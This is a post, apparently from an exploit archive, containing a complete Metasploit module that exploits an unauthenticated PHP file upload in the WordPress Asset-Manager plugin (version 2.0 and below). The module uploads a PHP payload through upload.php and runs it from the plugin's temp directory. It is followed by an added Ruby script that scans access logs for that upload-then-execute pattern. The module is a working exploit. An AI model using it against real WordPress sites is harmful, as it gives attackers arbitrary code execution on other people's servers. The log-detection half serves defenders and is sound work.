
WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload handler accepts PHP files: a user can upload a file into a temporary directory without any authentication, which results in arbitrary code execution on the web server.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```

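The module's `exploit` method leaves a distinctive two-request trail in the web server's access log: a POST to the plugin's `upload.php`, then a GET of a freshly named `.php` file under `wp-content/uploads/assets/temp/` from the same client. As an added defender-side example (not part of the original post or of the Metasploit module), the Ruby script below parses constructed combined-format access-log lines and flags clients that show that sequence. The sample log lines, the client addresses and the 300-second correlation window are assumptions made for the example; the request paths come from the module above.

```ruby
# Added example, not from the original post or the Metasploit module:
# triage web-server access logs for the upload-then-execute pattern used
# against Asset-Manager <= 2.0. Paths are taken from the module above;
# the log lines further down are constructed for this example.
require 'time'

UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php}i
# A .php file sitting in the plugin's temp upload directory.
TEMP_PHP        = %r{/wp-content/uploads/assets/temp/[^/\s?]+\.php(?:\?|\s|$)}i

# Apache/nginx "combined" log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<size>\S+)/

Event = Struct.new(:ip, :time, :method, :path, :status)

# Parse one log line into an Event; returns nil for lines that do not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  Event.new(m[:ip],
            Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
            m[:method], m[:path], m[:status].to_i)
end

# Return one alert per GET of a temp-directory .php file that was preceded,
# within +window+ seconds and from the same client, by a POST to upload.php.
def find_upload_then_exec(lines, window: 300)
  events = lines.map { |l| parse_line(l) }.compact
  alerts = []
  events.group_by(&:ip).each do |ip, evs|
    evs.sort_by!(&:time)
    uploads = evs.select { |e| e.method == 'POST' && e.path =~ UPLOAD_ENDPOINT }
    evs.each do |e|
      next unless e.method == 'GET' && e.path =~ TEMP_PHP
      prior = uploads.find { |u| u.time <= e.time && e.time - u.time <= window }
      next unless prior
      alerts << { ip: ip, upload_at: prior.time, exec_at: e.time,
                  path: e.path, status: e.status }
    end
  end
  alerts
end

# Constructed sample log: one client performs the upload + execute sequence,
# another fetches an ordinary image and logs in normally.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzrt.php HTTP/1.1" 200 0
  198.51.100.4 - - [31/Dec/2012:09:25:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 80231
  198.51.100.4 - - [31/Dec/2012:09:25:10 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
LOG

def alerts_for_sample
  find_upload_then_exec(SAMPLE_LOG.lines)
end

if __FILE__ == $0
  alerts_for_sample.each do |a|
    puts "#{a[:ip]} POSTed to upload.php at #{a[:upload_at].iso8601} then requested " \
         "#{a[:path]} (HTTP #{a[:status]}) at #{a[:exec_at].iso8601}"
  end
end
```

Run it against a real access log with `find_upload_then_exec(File.readlines('access.log'))`. The GET is flagged even when it returns 404, since a failed attempt is still worth seeing; the 200 on the upload POST and the presence of the file name in the response body (which the module checks) are not visible in access logs, so the follow-up GET of a `.php` file in a directory that should only hold uploaded assets is the higher-confidence signal. The same regexes also work as a standing rule: any request for a `.php` file under `wp-content/uploads/` is anomalous on a correctly configured WordPress host.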